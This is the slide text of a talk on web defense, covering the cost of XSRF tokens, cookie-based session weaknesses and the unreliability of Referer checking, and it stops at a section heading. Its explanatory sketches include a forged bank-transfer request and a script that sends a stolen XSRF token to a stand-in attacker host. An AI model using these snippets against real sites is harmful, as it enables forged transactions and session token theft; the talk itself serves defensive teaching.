For Great Justice: Rethinking the Strange Reality of Web Defense
Dan Kaminsky
Director Of Penetration Testing
IOActive
Introduction
• I’m Dan Kaminsky
– This is not a talk on DNS
– This is not a talk on DNSSEC
– This is not a talk on X.509
– This is (mostly) not even a talk about offense
• Though it’ll happen
• We are here to discuss defense
– Why it’s hard
– Why it’s still hard
– How the Web is (still!) difficult to secure in very basic ways
– What technical steps can be taken to make it easier for developers to
secure their sites
Warning
• This is one of the more ornery talks I have ever
delivered.
– I don’t think Security has been sufficiently
respectful of other engineering requirements.
– I don’t think randomized tokens in GETs or POSTs
are a particularly scalable solution to XSRF
– I’m not a big fan of regular expressions. Period.
And you won’t believe what I want to do with
Base64.
The Web Has Won
• HTML, JavaScript, and CSS are, by a wide margin,
the most popular programming languages on the
planet, at least for front end design
– Bigger than Win32
– Bigger than Objective C
– Bigger than Java
– Bigger than Flash
• Why install software when you can just browse
to www.kayak.com?
The Web Has A Security Problem
• Cross Site Scripting (XSS) and Cross Site Request
Forgery (XSRF) are endemic
• SQL Injection is not going away
– And not just SQL – XML, JSON, even LDAP is in
trouble
• These are not new problems. These go back a
decade. Why are we still suffering them?
– After all, we’ve been saying for years, use randomized
tokens in URLs, and “validate your input”!
The Traditional Response
• “Developers are stupid and lazy.”
– This is a great response – for our egos
– It defines hackers as intelligent and industrious!
The Reality (as I see it)
• It remains too difficult to make web browsers do
surprisingly simple things
– “Dan, I’ve been coming to Defcon for years. I love
security. But you know, it’s $50K for me to build the
site, and $150K for me to get somebody to come out
and secure it. Do you know anybody who will pay 4x
for me to build them a site?”
– Our advice for how to secure things is really amazingly
expensive
• Expensive in terms of dev hours
• Expensive in terms of outside validation
– We think that’s OK, because Security Is Important
The Reality Of Randomized Tokens In URLs
(to stop XSRF, and maybe XSS)
• http://www.site.com/foo.php?token=298371231
– (Or a hidden form element in POSTs)
• [All] application local URLs have to be rewritten for using the randomizer
object. While standard HTML forms and hyperlinks pose no special
challenge, prior existing JavaScript may be harder to deal with. All
JavaScript functions that assign values to document.location or open
new windows have to be located and modified. Also all existing onclick
and onsubmit events have to be rewritten. Furthermore, HTML code
might include external referenced JavaScript libraries, which have to be
processed as well. Because of these problems, a web application that is
protected by such a solution has to be examined and tested thoroughly.
– Martin Johns, University of Hamburg, on “SessionSafe”, a system which put
randomized tokens in DNS subdomains – an easier place for them (thanks to
Amit Klein for pointing me to this paper)
– http://www.informatik.uni-hamburg.de/SVS/papers/2006_esorics_SessionSafe.pdf
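• To make the cost concrete, a minimal sketch of the token pattern itself, in Node.js-flavored JavaScript (the names, endpoint, and session store are invented for illustration):

  const crypto = require('crypto');

  const sessions = {}; // sessionId -> { xsrfToken }

  function issueToken(sessionId) {
    const token = crypto.randomBytes(16).toString('hex');
    sessions[sessionId] = { xsrfToken: token };
    return token;
  }

  // Every generated form (and URL, and navigating script) must be
  // rewritten to carry the token...
  function renderTransferForm(sessionId) {
    const token = issueToken(sessionId);
    return '<form method="POST" action="/transfer">' +
           '<input type="hidden" name="token" value="' + token + '">' +
           '<input type="submit" value="Transfer"></form>';
  }

  // ...and every state-changing request must present it back.
  function isValidRequest(sessionId, submittedToken) {
    const s = sessions[sessionId];
    return !!s && s.xsrfToken === submittedToken;
  }

• The twenty lines above are not the expensive part; Johns’ point is that retrofitting the token into every link, form, and document.location assignment an existing application generates is.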
And it’s not like we’re weak in really obscure
places
• XSS and XSRF are both failures of Session Management
– Session management isn’t exactly an obscure feature! It’s an
inherent aspect of any system that allows authentication!
• Except the web wasn’t originally designed as a particularly authenticated
resource
• All material was designed to be able to link to all other material
• Most material was assumed to be flat text files in a directory somewhere
– Session management’s “canonical implementation” is cookies
• Small blobs of data that, once added to a domain, are attached to each request
to that domain
– Cookies don’t care where a request came from
• So, badguy.com can send you to goodbank.com, any URL, and mix his chosen
URL with your authenticated credentials
• This is the heart of XSS and XSRF (sketched after this list)
• XSRF tokens are about sacrificing the automatic nature of cookies for manual
integration of the token in each generated URI
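• A sketch of that heart, as script running on badguy.com (the bank URL and parameters are invented):

  // The browser attaches the victim's goodbank.com cookie to this
  // request, even though goodbank.com never linked to this page.
  const img = new Image();
  img.src = 'https://www.goodbank.com/transfer?to=badguy&amount=1000';
  // No response is even needed -- if the endpoint acts on cookie
  // authentication alone, the XSRF has already succeeded.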
A Question
• It’s 2010. Why is secure session management still such a
hack?
– XSRF tokens are painful and expensive to deploy (and only kind of
work)
• Tokens in URIs, either subdomain or GET param, leak via Referer headers
and document.referrer; see Nathan Hamiel and Shawn Moyer’s Dynamic
CSRF talk from BH2010, and the sketch at the end of this slide
– OK, yes, XSRF tokens could be made one-time use, or bound to the rest of the URI.
STILL.
– Cookies leak, even with “secure”, even with “httponly”
• Answer: The security community hasn’t asked for anything
better.
– Gut response: “See, this is why third party cookies should be shut
off! Then, they’ll have to use XSRF tokens!”
• “Who cares if it’ll break the web? It’ll still work…um…mostly…”
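• The Referer leak, sketched as script on badguy.com, assuming a token-in-URL scheme like the one shown earlier (the regex and collection URL are mine):

  // Runs after a victim follows any outbound link from a page whose
  // URL carries the XSRF token.
  const ref = document.referrer;
  // e.g. "http://www.site.com/foo.php?token=298371231"
  const match = ref.match(/[?&]token=([^&]+)/);
  if (match) {
    // The attacker now holds a token valid for the victim's session.
    new Image().src = 'https://badguy.com/collect?token=' + match[1];
  }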
Our Message
• “It doesn’t matter if it’s expensive.”
• “It doesn’t matter if it’s fragile.”
• “It doesn’t matter if it breaks things.”
• “It doesn’t matter if it doesn’t even do a great job
securing things.”
• It’s security! Obviously everybody has to do it!
– And so instead of improving our technologies to the
point where security is achievable, we spin our wheels
demanding the deployment of immature defenses
You may disagree.
• If you think all our existing solutions are good
enough, and the only problem is lazy and
stupid developers (“insufficiently incentivized”
if you’re an academic), nothing I can say is
going to convince you otherwise.
• But if you agree, then your immediate question
should be: What are you recommending?
– It is not enough to curse the darkness. One must
praise the light!
First Law Of Securing the Web:
You are not allowed to break the web.
• This is a point of significant contention!
– Not just about cookies.
• Remember “Mogul”, the huge project centered
around dealing with Marsh Ray’s TLS Renegotiation
vulnerability?
• Remember how it involved an enormous IETF
standardization effort around a fix, and a huge amount
of work?
• Did you notice all the patch announcements of crypto
libraries applying the renegotiation fix?
The Fix Is Off By Default In Firefox
• Just like I told Marsh Ray it would be.
• “Note that to benefit from the fix for CVE-2009-3555 added
in nss-3.12.6, Firefox 3.6 users will need to set their
security.ssl.require_safe_negotiation preference to true. In
Mandriva the default setting is false due to problems with
some common sites.” – Mandriva Patch Notes
– security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref
Current default value: DEPENDS, see end of section
The development version of Firefox (3.7-pre) uses "false"
The stable releases 3.5.9 and 3.6.2 use "true"
As soon as a sufficient number of servers have had a chance to
upgrade, the default in stable releases will be switched to "false", too
Corollary: You Can’t Afford To Wait For
Everybody To Patch
• “The Internet Has No Flag Days”
– i.e. “OK everyone, on July 8th, 2013, we will all
simultaneously stop using Internet Explorer 6”
• They needed to find a way to securely downgrade
for servers that didn’t support their fix.
– They didn’t (maybe they couldn’t?), and ultimately, it’s
now all lost effort.
– When will enough internal servers patch? Never.
– Hard but true.
Second Law Of Securing The Web:
Defenses must meet all engineering requirements
• Classical security theory: “The attacker need only find
one bug, while the defender must find them all.”
– This is true, but incomplete.
• Updated security theory: “The attacker need only
consider one engineering requirement, while the
defender must balance them all.”
– If your defense is not fast enough, it’s not good enough
– If your defense is not compatible enough, it’s not good
enough
– If your defense is not reliable enough, it’s not good enough
– If your defense is not usable enough, it’s not good enough
– If your defense is too hard to build or deploy, it will probably
be neither built nor deployed
Security Is (Still!) New
• Security is a new first class engineering requirement for
software
– Power efficiency is a new first class engineering requirement for
consumer electronics
– Just because the TV takes less electricity doesn’t mean it’s allowed to
be any less pretty
– Just because the code is more secure doesn’t mean it’s allowed to be
slow
• There remains surprisingly basic work to be done to facilitate
security
– Building a secure session context is one of those things
– Let’s talk about how to do that, while not screwing everything else up
So. How are we going to get a secure session
context?
• First – why does a secure session context
improve security?
– What do Cross Site Scripting (XSS) and Cross Site
Request Forgery (XSRF) have in common?
• XS: Cross Site
A Tale Of Two Classes Of Web Page
• BBC News: Needs Deep Linking
• Amazon.com Shopping Cart: Needs Security From Outside Attackers
On Boundaries
• Most natural place to place boundary: Unauthenticated vs.
Authenticated
– Unauthenticated pages are the best landing points
– Authenticated pages expose the greatest complexity
• A strong session context prevents (Reflected) XSS and XSRF
from executing at all
– The attacker just cannot navigate to the endpoint with the bug
– Making entire families of bugs unexploitable is always a good thing
– If even the unauthenticated landing points have sufficient
complexity that they’re likely to be XSSable, then www.foo.com can
be 302 Redirected to public.foo.com or even www.foopublic.com.
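• One way to read that last bullet as code, sketched in Node.js with the slide’s illustrative hostnames:

  const http = require('http');

  http.createServer((req, res) => {
    if (!req.headers.cookie) {
      // No session yet: bounce to the cookie-free public origin,
      // where an XSS never runs with authenticated state.
      res.writeHead(302, { Location: 'http://public.foo.com' + req.url });
      return res.end();
    }
    // ...authenticated application logic continues here...
    res.end('authenticated content');
  }).listen(80);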
The Most Common Attempt:
Server-Side Referrer Checking
• HTTP requests can contain a “Referer” field, which is supposed to
describe the URL of the page that sourced the request for a
particular asset
– Yes, it’s misspelled in the standard
• It is possible for an HTTP server to examine every request that
comes in with an authenticated Cookie, and see if it also comes in
with a Referer header from the same site (sketched at the end of this slide)
• Many Content Management Systems have attempted to use Referer
checking to stop XSRF and related attacks
– Developers, finding a defensive technology that is easy and
non-disruptive to implement, will actually do the work!
• We tell them not to do this, for “Security Reasons”
– “Referer headers can be spoofed using XMLHTTP and by using flash as
demonstrated by Amit Klein and rapid7 and therefore cannot be trusted.”
• http://www.cgisecurity.com/csrf-faq.html
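• In code, the check is as small as it sounds; a Node.js-style sketch (the function name is mine):

  // Strict variant: a cookie-authenticated, state-changing request is
  // honored only if the Referer names our own host.
  function referrerLooksLocal(req, ourHost) {
    const ref = req.headers.referer; // yes, misspelled in the standard
    if (!ref) return false;          // no header, no entry
    try {
      return new URL(ref).hostname === ourHost;
    } catch (e) {
      return false;                  // malformed Referer: reject
    }
  }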
But It’s Not True!
• The bugs Amit et al. reported were fixed years ago
• There is no known mechanism for causing a
browser to emit an arbitrary Referer header,
and there hasn’t been one for quite some time.
– More importantly, if one is found, it’s fixed, just
like a whole host of other browser bugs
• So can we use this?
The Real Reason You Can’t Depend On Server-
Side Referrer: Appcompat
• There are many mechanisms that result in web browsers
navigating from page to page
– Follow an anchor
– Change document.location.href
– Follow a 302 redirect
– Follow a <meta http-equiv=“refresh”> link
– window.open
• Referer header inconsistently attached – some methods
have the header, some don’t
– Differs by browser
– Really differs by plugin
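• The same logical navigation, spelled five ways; whether a Referer accompanies each varies (the HTML and HTTP variants are shown as comments):

  document.location.href = 'http://www.site.com/next'; // script navigation
  window.open('http://www.site.com/next');             // new window
  //   <a href="http://www.site.com/next">next</a>          anchor follow
  //   <meta http-equiv="refresh" content="0;url=/next">     meta refresh: no Referer
  //   HTTP/1.1 302 Found + Location: /next                  server redirect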
…and that’s without the “security tools”
butting in
• http://codex.wordpress.org/Enable_Sending_Referrers -- how to
make Wordpress administration work (at least for 2.0x) if you have
any of the following installed:
– Norton Internet Security, Norton Personal, NetBarrier, SyGate Firewall,
Kerio Firewall 4, Zone Alarm Pro, Agnitum Outpost Firewall Pro 2008,
McAfee, Privoxy, etc.
• And that’s to say nothing about network proxies like Squid, from
which about one fifth of HTTP requests are sourced
• Most blocking is there to protect privacy interests or to protect
against Dynamic XSRF attacks, which is reasonable, but it applies
even to Referer headers for the same site
– One security technology interfering with another security technology?
Impossible!
Fail Open, Openly Failing
• “Can’t we just enforce XSRF protections if there’s a
Referer header, and allow the user in anyway (fail
open) if the header is missing?”
– This is actually the policy of some CMSes in the field (sketched below)
– Since there are navigation types that suppress Referer
even on unfiltered hosts (<meta http-equiv=“refresh”>),
they’re exposed.
• See also, HTTPS->HTTP Referer suppression, which is an
intentional feature to prevent full URI leakage from the secure
context (thanks David Ross, Sirdarckat)
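• The fail-open policy, sketched against the strict check from two slides back; the hole is the first branch:

  function failOpenCheck(req, ourHost) {
    const ref = req.headers.referer;
    if (!ref) return true;   // header missing: allowed in -- the exposure
    try {
      return new URL(ref).hostname === ourHost;
    } catch (e) {
      return true;           // unparseable header: also failing open
    }
  }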
Can We Go Client Side?
• Suppose there’s too much weirdness going on at the HTTP layer to
detect cross-site activity at the server
– Not going to go into the Origin header; let’s just say it’s unusable in its
present state
• Suppose we could detect such behavior in the client. Could we use
it?
– “But we’re pushing security to the client! We’re not supposed to trust the
client!”
– It is the client that has the context of where the request really came from;
the server is impoverished
• Two problems
– 1) How do we prevent execution of an XSS?
– 2) How do we prevent navigation to an XSRF vulnerable endpoint?
Preventing Script Execution Via Interpreter Suicide